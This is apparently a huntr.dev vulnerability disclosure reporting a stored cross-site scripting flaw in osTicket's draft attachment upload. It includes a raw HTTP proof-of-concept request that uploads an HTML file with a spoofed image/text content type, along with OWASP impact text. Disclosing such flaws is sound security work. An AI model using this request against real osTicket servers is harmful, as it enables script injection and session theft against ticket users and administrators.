Lucene search

K
huntrTheworstcomradeC2BB34AC-452D-4624-A1B9-C5B54F52F0CD
HistoryOct 18, 2021 - 8:47 p.m.

Cross-site Scripting (XSS) - Stored in osticket/osticket

2021-10-1820:47:48
theworstcomrade
www.huntr.dev
17

0.001 Low

EPSS

Percentile

32.5%

Description

As it is written on github profile, osTicket is a widely-used open source support ticket system. During source code research I discovered bad uploaded file type check, which is controlled by user. Unauthenticated user can upload malicious html/js file.

FROM OWASP:: Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user.

Proof of Concept

POST /ajax.php/draft/ticket.client.jfi710uc6f1h/attach HTTP/1.1
Host: 172.17.0.1:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------124988469840978117853377254190
Content-Length: 6456
Origin: http://172.17.0.1:8888
DNT: 1
Connection: close
Referer: http://172.17.0.1:8888/open.php
Cookie: OSTSESSID=2h2moaijbnk5nojfi710uc6f1h

-----------------------------124988469840978117853377254190
Content-Disposition: form-data; name="file[]"; filename="osticket-phish.html"
Content-Type: image/png,text/html

<html>
<img src>
&lt;/html&gt;

-----------------------------124988469840978117853377254190--


PoC Video

https://www.youtube.com/watch?v=iasn6dEDnCw

Impact

FROM OWASP:: An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site.

In this case local link generated link is valid for few hours, and is visible by issue author and administrators.

0.001 Low

EPSS

Percentile

32.5%

Related for C2BB34AC-452D-4624-A1B9-C5B54F52F0CD